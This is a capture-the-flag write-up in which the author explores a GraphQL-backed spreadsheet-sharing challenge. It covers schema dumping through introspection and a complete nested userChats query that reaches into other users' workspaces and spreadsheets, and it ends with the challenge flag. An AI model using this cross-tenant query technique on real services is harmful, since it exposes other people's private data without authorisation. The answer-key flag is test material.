The challenge seems like a platform where we can create our own workspace and share our spreadsheets with the others. I tried to use the existing space and create a sample spreadsheets to play around.
Niceee! I can even edit each cell and row in the spreadsheet too! As always, I’m questioning myself.. ‘What’s happening behind the scene?’. Therefore, I started to intercept and found something.
Dang! I can see directly the GraphQL query in the request body. This must be somesort of GraphQL injection. I started to dump the whole schema using IntrospectionQuery from the request.
Thanks to this blog. I able to learnt quickly about GraphQL injection since this is my first time doing it xD.
https://hg8.sh/posts/misc-ctf/graphql-injection/
Yep! I got the whole objects and schemas. Let’s dump the JSON response into https://apis.guru/graphql-voyager/ to get better readibility and visibility.
I can see there are bunch of schemas and columns like flag and spreadsheets that I need to dump. Let’s try use inQL extension in the BurpSuite to get some boilerplates.
Seems like I can use userChats queries to dump all spreadsheets contents of the user in the chats. I started to construct my own payload based on the boilerplat and the map previously and came out as below.
query userChats {
userChats {
id
messages {
chat {
id
participants {
id
}
messages {
id
}
}
id
sender {
id
}
timestamp
}
participants {
email
id
username
workspaces {
id
name
spreadsheets {
flag
cells {
content
}
}
}
}
}
}
Formatted:
{"query":"query userChats {\n userChats {\n id\n messages {\n chat {id participants {id} messages {id}}\n id\n sender{id}\n timestamp\n }\n participants {\n email\n id\n username\n workspaces{id, name, spreadsheets {flag, cells{content}}}\n }\n }\n}"}
Send the payload in the repeater and the flag shown in one of the user spreadsheet’s content.
Flag: H7Tex{t3n4nt_h0pp1ng_v1a_l34ky_4p1s+aef7b25bbc98e4ce}